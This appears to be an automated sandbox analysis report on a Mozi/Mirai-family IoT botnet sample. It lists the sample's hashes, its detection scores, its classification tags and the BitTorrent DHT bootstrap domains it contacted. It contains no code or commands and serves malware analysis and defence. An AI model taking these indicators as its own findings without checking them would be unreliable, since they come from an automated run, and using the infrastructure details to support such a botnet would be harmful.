Mozi.m.3

Status: finished
Submission Time: 2022-01-28 13:56:42 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID: 562113
  • API (Web) ID: 929635
  • Analysis Started: 2022-01-28 13:56:42 +01:00
  • Analysis Finished: 2022-01-28 14:05:47 +01:00
  • MD5: eec5c6c219535fba3a0492ea8118b397
  • SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:

System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

malicious
100/100

malicious
32/49

malicious
24/35

malicious
21/28

malicious

IPs

IP Country Detection

Domains

Name IP Detection
dht.transmissionbt.com 87.98.162.88
bttracker.acc.umu.se 130.239.18.158
router.bittorrent.com 67.215.246.10
router.utorrent.com 82.221.103.244
bttracker.debian.org 0.0.0.0

URLs

Name Detection

Dropped files

Name File Type Hashes Detection